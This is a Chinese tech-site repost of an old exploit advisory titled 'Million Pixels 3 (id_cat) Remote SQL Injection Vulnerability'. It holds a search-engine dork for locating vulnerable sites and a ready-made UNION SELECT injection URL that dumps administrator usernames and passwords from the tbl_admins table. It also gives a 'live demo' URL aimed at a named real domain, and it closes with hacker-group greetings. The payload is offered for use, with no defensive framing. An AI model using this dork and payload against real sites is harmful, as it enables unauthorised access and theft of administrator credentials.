首页 > 系统服务 > 详细

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

时间:2016-02-08 16:12:31      阅读:163      评论:0      收藏:0      [点我收藏+]
#################################################################
#
# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
#
#========================================================
# =
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
# =
#========================================================
#
# script : http://e-topbiz.com/oprema/pages/millionpixels3.php
#
# DorK : inurl: "tops_top.php? id_cat ="
#################################################################

Exploit:


www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*




L!VE DEMO:


http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*




########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################

Im IRAQi

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

原文:http://www.jb51.net/hack/5673.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!